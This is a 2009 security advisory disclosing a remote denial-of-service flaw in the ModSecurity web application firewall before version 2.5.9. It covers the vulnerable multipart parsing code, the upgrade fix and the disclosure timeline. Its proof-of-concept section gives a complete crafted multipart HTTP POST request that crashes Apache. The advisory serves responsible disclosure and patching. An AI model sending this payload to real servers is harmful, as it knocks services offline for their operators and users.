[ISecAuditors Security Advisories] ModSecurity < 2.5.9 remote Denial of Service (DoS)

[ISecAuditors Security Advisories <advisories () isecauditors com>]

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-001
- Original release date: February 25th, 2009
- Last revised:  March 19th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 7.8/10 (CVSS Base Scored)
=============================================

I. VULNERABILITY
-------------------------
ModSecurity < 2.5.9 is vulnerable to a remote Denial of Service (DoS)

II. BACKGROUND
-------------------------
ModSecurity is the most widely-deployed web application firewall in
the world, with more than 15,000 users. It runs as a Apache web server
module and is developed by Breach Security [ http://www.breach.com ],
it's avaliable with GNU GPL and many other comercial licenses.

III. DESCRIPTION
-------------------------
The multipart processor of modsecurity does not sanitize the user
supplied input sufficiently. Therefore, an attacker can send a crafted
post request of type multipart/form-data which will lead in a remote
denial of service.

The snippet of vulnerable code:

in file msc_multipart.c

1256 int multipart_get_arguments(modsec_rec *msr, char *origin,
apr_table_t *arguments) {
1257     multipart_part **parts;
1258     int i;
1259
1260     parts = (multipart_part **)msr->mpd->parts->elts;
1261     for(i = 0; i < msr->mpd->parts->nelts; i++) {
1262         if (parts[i]->type == MULTIPART_FORMDATA) {
1263             msc_arg *arg = (msc_arg *)apr_pcalloc(msr->mp,
sizeof(msc_arg));
1264             if (arg == NULL) return -1;
1265
1266             arg->name = parts[i]->name;
1267             arg->name_len = strlen(parts[i]->name);

On line 1267, due to the pointer parts[i]->name is not properly
sanitized the parameter of strlen function takes the value NULL,
getting a segmentation fault and resulting in a crash of the apache
process that handle the request.

IV. PROOF OF CONCEPT
-------------------------
The process could be crashed remotely by sending:

POST / HTTP/1.0
Content-Type: multipart/form-data;
boundary=---------------------------xxxxxxxxxxxxxx
Content-Length: 91

-----------------------------xxxxxxxxxxxxxx
:
-----------------------------xxxxxxxxxxxxxx--

In order to send a correct HTTP/1.1 request you must add a valid Host
header.

With the configuration directives:

    SecAuditEngine On
    SecDebugLogLevel 9

After the attack, the last line of the debug logfile is:

[25/Feb/2009:09:51:18 +0100] [vhost/sid#884348][rid#aaf0d8][/][9]
Multipart: Added part abe458 to the list: name "(null)" (offset 0,
length 0)

V. BUSINESS IMPACT
-------------------------
An attacker could cause a remote denial of service to an Apache
installation with modsecurity 2 module.

VI. SYSTEMS AFFECTED
-------------------------
ModSecurity between 2.5.5 and 2.5.8 are vulnerable, other versions may
be affected.

Tested with Apache httpd 2.2.11.

VII. SOLUTION
-------------------------
Upgrade to version 2.5.9 of ModSecurity. It can be downloaded from
http://modsecurity.org/download/

VIII. REFERENCES
-------------------------
http://www.modsecurity.org
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
Thanks to Jordi Rubió Romero (jrubio (at) isecauditorts (dot) com).

X. REVISION HISTORY
-------------------------
February 25, 2009: Initial release
March    19, 2009: Revision.

XI. DISCLOSURE TIMELINE
-------------------------
Febraury 25, 2009: Vulnerability acquired by
                   Internet Security Auditors (www.isecauditors.com)
March    02, 2009: ModSecurity contacted.
March    02, 2009: Response about remediation plan.
March    11, 2009: Path released
March    19, 2009: Published.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.